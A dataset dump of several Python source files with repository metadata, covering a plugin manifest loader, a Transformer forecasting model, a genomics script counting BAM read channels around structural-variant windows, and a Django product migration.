'Plugin Manifest file loaded at {}'.format(self.plugin_path))
self.plugin_settings = utils.merge_dict(self.plugin_settings, settings, True)
except FileNotFoundError:
self.logger.warning(
'PLUGIN MANIFEST FILE NOT FOUND AT {}'.format(self.plugin_path))
@property
def name(self):
return self.plugin_settings['name']
| 43.892216
| 136
| 0.65075
|
import logging
import json
import importlib
import importlib.resources
import lib.common.utils as utils
import lib.common.exceptions as exceptions
from lib.config.config_defn import ConfigDefn
from lib.db.db_plugins import DBPlugins
from lib.db.db_config_defn import DBConfigDefn
PLUGIN_CONFIG_DEFN_FILE = 'config_defn.json'
PLUGIN_INSTANCE_DEFN_FILE = 'instance_defn.json'
PLUGIN_MANIFEST_FILE = 'plugin.json'
def register(func):
Plugin._plugin_func = func
return func
class Plugin:
_plugin_func = None
logger = None
def __init__(self, _config_obj, _plugin_defn, _plugin_path):
if Plugin.logger is None:
Plugin.logger = logging.getLogger(__name__)
self.enabled = True
self.plugin_path = _plugin_path
self.config_obj = _config_obj
self.db_configdefn = DBConfigDefn(_config_obj.data)
self.load_config_defn()
self.init_func = Plugin._plugin_func
self.plugin_settings = {}
self.plugin_db = DBPlugins(_config_obj.data)
self.namespace = None
self.instances = []
self.load_plugin_manifest(_plugin_defn)
self.plugin_obj = None
if not self.config_obj.data[self.namespace.lower()]['enabled']:
self.enabled = False
self.logger.debug('Plugin disabled in config.ini for {}'.format(self.name))
return
self.load_instances()
self.logger.notice('Plugin created for {}'.format(self.name))
def load_config_defn(self):
try:
self.logger.debug(
'Plugin Config Defn file loaded at {}'.format(self.plugin_path))
defn_obj = ConfigDefn(self.plugin_path, PLUGIN_CONFIG_DEFN_FILE, self.config_obj.data)
default_config = defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(defn_obj)
for area, area_data in defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
defn_obj.terminate()
except FileNotFoundError:
self.logger.warning(
'PLUGIN CONFIG DEFN FILE NOT FOUND AT {}'.format(self.plugin_path))
def load_instances(self):
inst_defn_obj = ConfigDefn(self.plugin_path, PLUGIN_INSTANCE_DEFN_FILE, self.config_obj.data, True)
self.instances = self.find_instances()
if len(self.instances) == 0:
self.enabled = False
self.config_obj.data[self.namespace.lower()]['enabled'] = False
self.logger.info('No instances found, disabling plugin {}'.format(self.namespace))
return
for inst in self.instances:
self.plugin_db.save_instance(self.namespace, inst, '')
inst_defn_obj.is_instance_defn = False
for area, area_data in inst_defn_obj.config_defn.items():
if len(area_data['sections']) != 1:
self.logger.error('INSTANCE MUST HAVE ONE AND ONLY ONE SECTION')
raise exceptions.CabernetException('plugin defn must have one and only one instance section')
section = list(area_data['sections'].keys())[0]
base_section = section.split('_', 1)[0]
area_data['sections'][base_section + '_' + inst] = area_data['sections'].pop(section)
if 'label' in self.config_obj.data[base_section + '_' + inst] \
and self.config_obj.data[base_section + '_' + inst]['label'] is not None:
area_data['sections'][base_section + '_' + inst]['label'] = self.config_obj.data[base_section + '_' + inst]['label']
inst_defn_obj.save_defn_to_db()
default_config = inst_defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
inst_defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(inst_defn_obj)
for area, area_data in inst_defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
def find_instances(self):
instances = []
inst_sec = self.namespace.lower() + '_'
for section in self.config_obj.data.keys():
if section.startswith(inst_sec):
instances.append(section.split(inst_sec, 1)[1])
return instances
def load_plugin_manifest(self, _plugin_defn):
self.load_default_settings(_plugin_defn)
self.import_manifest()
def load_default_settings(self, _plugin_defn):
for name, attr in _plugin_defn.items():
self.plugin_settings[name] = attr['default']
def import_manifest(self):
try:
json_settings = importlib.resources.read_text(self.plugin_path, PLUGIN_MANIFEST_FILE)
settings = json.loads(json_settings)
self.namespace = settings['name']
self.plugin_db.save_plugin(settings)
self.logger.debug(
'Plugin Manifest file loaded at {}'.format(self.plugin_path))
self.plugin_settings = utils.merge_dict(self.plugin_settings, settings, True)
except FileNotFoundError:
self.logger.warning(
'PLUGIN MANIFEST FILE NOT FOUND AT {}'.format(self.plugin_path))
@property
def name(self):
return self.plugin_settings['name']
| true
| true
|
1c40e8f255e777435d15fcc720e7c664f9f56b91
| 3,197
|
py
|
Python
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 5
|
2022-03-19T10:32:29.000Z
|
2022-03-29T00:50:30.000Z
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 1
|
2022-03-22T07:52:08.000Z
|
2022-03-22T07:55:28.000Z
|
models/seq2seq/Transformer.py
|
hyliush/deep-time-series
|
3fea4f62ea740c721c559a0d413e4b3a3e214b3e
|
[
"Apache-2.0"
] | 2
|
2022-03-19T21:07:39.000Z
|
2022-03-23T09:24:30.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
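# Construction sketch (hedged: the args fields mirror the attributes read in
# __init__ above; every value shown is a placeholder, not a project default):
#
#   from argparse import Namespace
#   args = Namespace(pred_len=24, output_attention=False, enc_in=7, dec_in=7,
#                    d_model=512, embed='timeF', freq='h', dropout=0.05,
#                    factor=5, n_heads=8, d_ff=2048, activation='gelu',
#                    e_layers=2, d_layers=1, distil=True, mix=True, out_size=7)
#   model = Transformer(args)
#
# forward() returns the last pred_len decoder steps: shape [B, pred_len, out_size].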
| 39.9625
| 114
| 0.558336
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :]
| true
| true
|
1c40e8f509b72527932d80c547e0cb3e0b1c1a43
| 9,242
|
py
|
Python
|
scripts/genome_wide/add_win_channels.py
|
renskir/sv-channels
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 24
|
2021-04-14T10:34:31.000Z
|
2022-03-21T07:18:05.000Z
|
scripts/genome_wide/add_win_channels.py
|
GooglingTheCancerGenome/CNN
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 49
|
2018-09-10T09:55:41.000Z
|
2020-04-15T12:44:22.000Z
|
scripts/genome_wide/add_win_channels.py
|
renskir/sv-channels
|
284335dc20b775f9e90a7f77809acbb838308cd8
|
[
"Apache-2.0"
] | 6
|
2020-06-17T11:57:38.000Z
|
2021-07-13T08:59:56.000Z
|
import argparse
import logging
from time import time
import numpy as np
import pysam
from functions import (is_left_clipped, is_right_clipped, load_windows,
save_windows)
def init_log(logfile):
FORMAT = '%(asctime)s %(message)s'
logging.basicConfig(format=FORMAT,
filename=logfile,
filemode='w',
level=logging.INFO)
def parse_args():
default_win = 25
parser = argparse.ArgumentParser(
description='Add window specific channels')
parser.add_argument('-b',
'--bam',
type=str,
default='../../data/test.bam',
help="Specify input file (BAM)")
parser.add_argument('-w',
'--win',
type=int,
default=default_win,
help="Window size")
parser.add_argument('-i',
'--input',
type=str,
default='./cnn/win' +
str(default_win)+'/split_reads/windows/DEL/windows.npz',
help="input file")
parser.add_argument('-o',
'--output',
type=str,
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.npz',
help="output file")
parser.add_argument('-l',
'--logfile',
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.log',
help='File in which to write logs.')
parser.add_argument('-lp',
'--log_every_n_pos',
type=int,
default=1000,
help='Write in log file every N positions')
parser.add_argument('-p',
'--padding',
type=int,
default=10,
help="Length of the padding in between windows")
return parser.parse_args()
def get_channels():
ch = [
# All reads (clipped or not)
'F_AR_N', 'R_AR_N',
# Split reads
'F_SR_L', 'F_SR_R', 'F_SR_B', 'R_SR_L', 'R_SR_R', 'R_SR_B', 'F_SR_N', 'R_SR_N',
# Clipped reads
'F_CR_L', 'F_CR_R', 'R_CR_L', 'R_CR_R', 'F_CR_B', 'R_CR_B', 'F_CR_N', 'R_CR_N',
# Discordant reads
'DR_F', 'DR_R',
# SV type channels
'DUP_A', 'DUP_B', 'INV_A', 'INV_B', 'TRA_O', 'TRA_S'
]
return {k: v for v, k in enumerate(ch)}
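# The dict maps channel names to fixed indices along the last array axis, e.g.
#
#   ch = get_channels()
#   ch['F_AR_N']   # -> 0  (forward-strand reads, any alignment, not clipped)
#   ch['TRA_S']    # -> 25 (translocation, same-strand mate)
#   len(ch)        # -> 26 channels per window position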
def update_channel(X, ch, counter, read, win_mid_pos, is_second_win, win_len, padding):
if is_left_clipped(read) and not is_right_clipped(read):
clipping = 'L'
elif not is_left_clipped(read) and is_right_clipped(read):
clipping = 'R'
elif is_left_clipped(read) and is_right_clipped(read):
clipping = 'B'
else:
clipping = 'N'
if read.has_tag('SA'):
clipped_state = 'SR'
elif is_left_clipped(read) or is_right_clipped(read):
clipped_state = 'CR'
else:
clipped_state = 'AR'
orientation = 'R' if read.is_reverse else 'F'
start_win = win_len + padding if is_second_win else 0
end_win = win_len * 2 + padding if is_second_win else win_len
abs_start = int(win_mid_pos - int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos - (win_len + 1) // 2)
abs_end = int(win_mid_pos + int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos + (win_len + 1) // 2)
start = max(read.reference_start, abs_start)
end = min(read.reference_end, abs_end)
rel_start = start_win + start - abs_start
rel_end = start_win + end - abs_start
assert rel_start >= 0
assert rel_end >= 0
assert start_win <= rel_start <= end_win
assert start_win <= rel_end <= end_win
skip = False
if is_left_clipped(read):
if (is_second_win and win_len + padding <= rel_start < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_start < win_len):
rel_pos = rel_start
else:
skip = True
elif is_right_clipped(read):
if (is_second_win and win_len + padding <= rel_end < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_end < win_len):
rel_pos = rel_end
else:
skip = True
else:
rel_pos = np.arange(max(start_win, rel_start), min(rel_end, end_win))
if not skip:
k = '_'.join([orientation, clipped_state, clipping])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_proper_pair:
k = '_'.join(['DR', orientation])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse and not read.mate_is_reverse \
and read.reference_start < read.next_reference_start:
k = '_'.join(['DUP', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_reverse and read.mate_is_reverse \
and read.reference_start > read.next_reference_start:
k = '_'.join(['DUP', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['INV', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['INV', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.reference_name != read.next_reference_name:
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['TRA', 'S'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['TRA', 'O'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
return X
def add_channels(args, aln):
win = args.win if args.win % 2 == 0 else args.win + 1
def get_reads(chrom, pos):
return [read for read in aln.fetch(chrom, pos - int(win / 2), pos + int(win / 2))]
# Load the windows
logging.info("Loading windows...")
last_t = time()
X, y = load_windows(args.input)
logging.info("Windows loaded in %f seconds" % (time() - last_t))
# Load the channels
ch = get_channels()
# get starting time
last_t = time()
# Initialize numpy array
X_enh = np.zeros(shape=(X.shape[:2] + (len(ch),)), dtype=np.int8)
for i, p in enumerate(y.keys(), start=0):
        # Every `log_every_n_pos` positions, write log information
if not i % args.log_every_n_pos and i != 0:
# Record the current time
now_t = time()
logging.info("%d positions processed (%f positions / s)" %
(i, args.log_every_n_pos / (now_t - last_t)))
last_t = time()
# Get genomic coordinates
chrom1, pos1, chrom2, pos2, strand_info = p.split('_')
pos1, pos2 = int(pos1), int(pos2)
# Fetch reads overlapping each window
win1_reads = get_reads(chrom1, pos1)
win2_reads = get_reads(chrom2, pos2)
# Which reads are in both windows?
win1_read_names_set = {read.query_name for read in win1_reads}
win2_read_names_set = {read.query_name for read in win2_reads}
common_read_names = win1_read_names_set & win2_read_names_set
# Only consider reads common to both windows
win1_reads = {
r for r in win1_reads if r.query_name in common_read_names and not r.is_unmapped}
win2_reads = {
r for r in win2_reads if r.query_name in common_read_names and not r.is_unmapped}
for r in win1_reads:
X_enh = update_channel(X_enh, ch, i, r, pos1,
False, win, args.padding)
for r in win2_reads:
X_enh = update_channel(X_enh, ch, i, r, pos2,
True, win, args.padding)
    # Slice the channel axis (axis 2) explicitly; the original `X_enh[i, :]`
    # indexed windows while iterating over channel indices.
    for i in np.arange(X_enh.shape[2]):
        logging.info("win channels array: non-zero elements at index %d:%d" %
                     (i, np.argwhere(X_enh[:, :, i] != 0).shape[0]))
    X = np.concatenate((X, X_enh), axis=2)
    logging.info("full channels array shape: %s" % str(X.shape))
    for i in np.arange(X.shape[2]):
        logging.info("full channels array: NaN elements at index %d:%d" %
                     (i, len(np.argwhere(np.isnan(X[:, :, i])))))
return X, y
def main():
args = parse_args()
init_log(args.logfile)
t0 = time()
with pysam.AlignmentFile(args.bam, "rb") as bam:
X, y = add_channels(args, bam)
save_windows(X, y, args.output)
logging.info('Finished in %f seconds' % (time() - t0))
if __name__ == '__main__':
main()
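A quick sketch of how the channel dictionary produced by get_channels() is consumed: update_channel() joins orientation, clipped state and clipping side into a key and uses the mapped integer as the channel index. The attribute values below are hypothetical examples, not data from the repository.

# Minimal sketch (assumed values): a forward-strand split read, left-clipped.
channels = get_channels()          # e.g. {'F_AR_N': 0, 'R_AR_N': 1, ...}
key = '_'.join(['F', 'SR', 'L'])   # orientation, clipped state, clipping side
assert key in channels
print(channels[key])               # channel index along the third array axis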
| 36.385827
| 93
| 0.528565
|
import argparse
import logging
from time import time
import numpy as np
import pysam
from functions import (is_left_clipped, is_right_clipped, load_windows,
save_windows)
def init_log(logfile):
FORMAT = '%(asctime)s %(message)s'
logging.basicConfig(format=FORMAT,
filename=logfile,
filemode='w',
level=logging.INFO)
def parse_args():
default_win = 25
parser = argparse.ArgumentParser(
description='Add window specific channels')
parser.add_argument('-b',
'--bam',
type=str,
default='../../data/test.bam',
help="Specify input file (BAM)")
parser.add_argument('-w',
'--win',
type=int,
default=default_win,
help="Window size")
parser.add_argument('-i',
'--input',
type=str,
default='./cnn/win' +
str(default_win)+'/split_reads/windows/DEL/windows.npz',
help="input file")
parser.add_argument('-o',
'--output',
type=str,
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.npz',
help="output file")
parser.add_argument('-l',
'--logfile',
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.log',
help='File in which to write logs.')
parser.add_argument('-lp',
'--log_every_n_pos',
type=int,
default=1000,
help='Write in log file every N positions')
parser.add_argument('-p',
'--padding',
type=int,
default=10,
help="Length of the padding in between windows")
return parser.parse_args()
def get_channels():
ch = [
'F_AR_N', 'R_AR_N',
'F_SR_L', 'F_SR_R', 'F_SR_B', 'R_SR_L', 'R_SR_R', 'R_SR_B', 'F_SR_N', 'R_SR_N',
'F_CR_L', 'F_CR_R', 'R_CR_L', 'R_CR_R', 'F_CR_B', 'R_CR_B', 'F_CR_N', 'R_CR_N',
'DR_F', 'DR_R',
'DUP_A', 'DUP_B', 'INV_A', 'INV_B', 'TRA_O', 'TRA_S'
]
return {k: v for v, k in enumerate(ch)}
def update_channel(X, ch, counter, read, win_mid_pos, is_second_win, win_len, padding):
if is_left_clipped(read) and not is_right_clipped(read):
clipping = 'L'
elif not is_left_clipped(read) and is_right_clipped(read):
clipping = 'R'
elif is_left_clipped(read) and is_right_clipped(read):
clipping = 'B'
else:
clipping = 'N'
if read.has_tag('SA'):
clipped_state = 'SR'
elif is_left_clipped(read) or is_right_clipped(read):
clipped_state = 'CR'
else:
clipped_state = 'AR'
orientation = 'R' if read.is_reverse else 'F'
start_win = win_len + padding if is_second_win else 0
end_win = win_len * 2 + padding if is_second_win else win_len
    abs_start = int(win_mid_pos - int(win_len / 2)) if win_len % 2 == 0 else \
        int(win_mid_pos - int((win_len + 1) / 2))
    abs_end = int(win_mid_pos + int(win_len / 2)) if win_len % 2 == 0 else \
        int(win_mid_pos + int((win_len + 1) / 2))
start = max(read.reference_start, abs_start)
end = min(read.reference_end, abs_end)
rel_start = start_win + start - abs_start
rel_end = start_win + end - abs_start
assert rel_start >= 0
assert rel_end >= 0
assert start_win <= rel_start <= end_win
assert start_win <= rel_end <= end_win
skip = False
if is_left_clipped(read):
if (is_second_win and win_len + padding <= rel_start < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_start < win_len):
rel_pos = rel_start
else:
skip = True
elif is_right_clipped(read):
if (is_second_win and win_len + padding <= rel_end < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_end < win_len):
rel_pos = rel_end
else:
skip = True
else:
rel_pos = np.arange(max(start_win, rel_start), min(rel_end, end_win))
if not skip:
k = '_'.join([orientation, clipped_state, clipping])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_proper_pair:
k = '_'.join(['DR', orientation])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse and not read.mate_is_reverse \
and read.reference_start < read.next_reference_start:
k = '_'.join(['DUP', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_reverse and read.mate_is_reverse \
and read.reference_start > read.next_reference_start:
k = '_'.join(['DUP', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['INV', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['INV', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.reference_name != read.next_reference_name:
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['TRA', 'S'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['TRA', 'O'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
return X
def add_channels(args, aln):
win = args.win if args.win % 2 == 0 else args.win + 1
def get_reads(chrom, pos):
return [read for read in aln.fetch(chrom, pos - int(win / 2), pos + int(win / 2))]
logging.info("Loading windows...")
last_t = time()
X, y = load_windows(args.input)
logging.info("Windows loaded in %f seconds" % (time() - last_t))
ch = get_channels()
last_t = time()
X_enh = np.zeros(shape=(X.shape[:2] + (len(ch),)), dtype=np.int8)
for i, p in enumerate(y.keys(), start=0):
if not i % args.log_every_n_pos and i != 0:
now_t = time()
logging.info("%d positions processed (%f positions / s)" %
(i, args.log_every_n_pos / (now_t - last_t)))
last_t = time()
chrom1, pos1, chrom2, pos2, strand_info = p.split('_')
pos1, pos2 = int(pos1), int(pos2)
win1_reads = get_reads(chrom1, pos1)
win2_reads = get_reads(chrom2, pos2)
win1_read_names_set = {read.query_name for read in win1_reads}
win2_read_names_set = {read.query_name for read in win2_reads}
common_read_names = win1_read_names_set & win2_read_names_set
win1_reads = {
r for r in win1_reads if r.query_name in common_read_names and not r.is_unmapped}
win2_reads = {
r for r in win2_reads if r.query_name in common_read_names and not r.is_unmapped}
for r in win1_reads:
X_enh = update_channel(X_enh, ch, i, r, pos1,
False, win, args.padding)
for r in win2_reads:
X_enh = update_channel(X_enh, ch, i, r, pos2,
True, win, args.padding)
    for i in np.arange(X_enh.shape[2]):
        logging.info("win channels array: non-zero elements at index %d:%d" %
                     (i, np.argwhere(X_enh[:, :, i] != 0).shape[0]))
    X = np.concatenate((X, X_enh), axis=2)
    logging.info("full channels array shape: %s" % str(X.shape))
    for i in np.arange(X.shape[2]):
        logging.info("full channels array: NaN elements at index %d:%d" %
                     (i, len(np.argwhere(np.isnan(X[:, :, i])))))
return X, y
def main():
args = parse_args()
init_log(args.logfile)
t0 = time()
with pysam.AlignmentFile(args.bam, "rb") as bam:
X, y = add_channels(args, bam)
save_windows(X, y, args.output)
logging.info('Finished in %f seconds' % (time() - t0))
if __name__ == '__main__':
main()
| true
| true
|
1c40e97cc8a3abf448891862595818c4fa990f21
| 4,546
|
py
|
Python
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 3
|
2019-06-09T18:00:54.000Z
|
2019-06-18T10:07:39.000Z
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 2
|
2019-07-02T13:39:49.000Z
|
2019-07-07T09:38:27.000Z
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 1
|
2019-05-02T17:30:49.000Z
|
2019-05-02T17:30:49.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-06 10:07
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [("product", "0029_product_is_featured")]
operations = [
migrations.AlterModelOptions(
name="attributechoicevalue",
options={
"verbose_name": "attribute choices value",
"verbose_name_plural": "attribute choices values",
},
),
migrations.AlterModelOptions(
name="category",
options={"verbose_name": "category", "verbose_name_plural": "categories"},
),
migrations.AlterModelOptions(
name="product",
options={"verbose_name": "product", "verbose_name_plural": "products"},
),
migrations.AlterModelOptions(
name="productattribute",
options={
"ordering": ("name",),
"verbose_name": "product attribute",
"verbose_name_plural": "product attributes",
},
),
migrations.AlterModelOptions(
name="productclass",
options={
"verbose_name": "product class",
"verbose_name_plural": "product classes",
},
),
migrations.AlterModelOptions(
name="productimage",
options={
"ordering": ("order",),
"verbose_name": "product image",
"verbose_name_plural": "product images",
},
),
migrations.AlterModelOptions(
name="productvariant",
options={
"verbose_name": "product variant",
"verbose_name_plural": "product variants",
},
),
migrations.AlterModelOptions(
name="variantimage",
options={
"verbose_name": "variant image",
"verbose_name_plural": "variant images",
},
),
migrations.AlterField(
model_name="product",
name="product_class",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="products",
to="product.ProductClass",
verbose_name="product class",
),
),
migrations.AlterField(
model_name="productimage",
name="image",
field=versatileimagefield.fields.VersatileImageField(
upload_to="products", verbose_name="image"
),
),
migrations.AlterField(
model_name="productimage",
name="order",
field=models.PositiveIntegerField(editable=False, verbose_name="order"),
),
migrations.AlterField(
model_name="productimage",
name="ppoi",
field=versatileimagefield.fields.PPOIField(
default="0.5x0.5", editable=False, max_length=20, verbose_name="ppoi"
),
),
migrations.AlterField(
model_name="productimage",
name="product",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="images",
to="product.Product",
verbose_name="product",
),
),
migrations.AlterField(
model_name="productvariant",
name="images",
field=models.ManyToManyField(
through="product.VariantImage",
to="product.ProductImage",
verbose_name="images",
),
),
migrations.AlterField(
model_name="variantimage",
name="image",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductImage",
verbose_name="image",
),
),
migrations.AlterField(
model_name="variantimage",
name="variant",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductVariant",
verbose_name="variant",
),
),
]
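Each AlterModelOptions entry above corresponds to a plain Meta change on the model; a hedged sketch of the product-image side, with the field list trimmed and names assumed from the operations rather than taken from the repository:

# Hypothetical model definition matching the productimage operations above.
from django.db import models

class ProductImage(models.Model):
    order = models.PositiveIntegerField(editable=False, verbose_name="order")

    class Meta:
        ordering = ("order",)
        verbose_name = "product image"
        verbose_name_plural = "product images"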
| 33.426471
| 86
| 0.523977
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [("product", "0029_product_is_featured")]
operations = [
migrations.AlterModelOptions(
name="attributechoicevalue",
options={
"verbose_name": "attribute choices value",
"verbose_name_plural": "attribute choices values",
},
),
migrations.AlterModelOptions(
name="category",
options={"verbose_name": "category", "verbose_name_plural": "categories"},
),
migrations.AlterModelOptions(
name="product",
options={"verbose_name": "product", "verbose_name_plural": "products"},
),
migrations.AlterModelOptions(
name="productattribute",
options={
"ordering": ("name",),
"verbose_name": "product attribute",
"verbose_name_plural": "product attributes",
},
),
migrations.AlterModelOptions(
name="productclass",
options={
"verbose_name": "product class",
"verbose_name_plural": "product classes",
},
),
migrations.AlterModelOptions(
name="productimage",
options={
"ordering": ("order",),
"verbose_name": "product image",
"verbose_name_plural": "product images",
},
),
migrations.AlterModelOptions(
name="productvariant",
options={
"verbose_name": "product variant",
"verbose_name_plural": "product variants",
},
),
migrations.AlterModelOptions(
name="variantimage",
options={
"verbose_name": "variant image",
"verbose_name_plural": "variant images",
},
),
migrations.AlterField(
model_name="product",
name="product_class",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="products",
to="product.ProductClass",
verbose_name="product class",
),
),
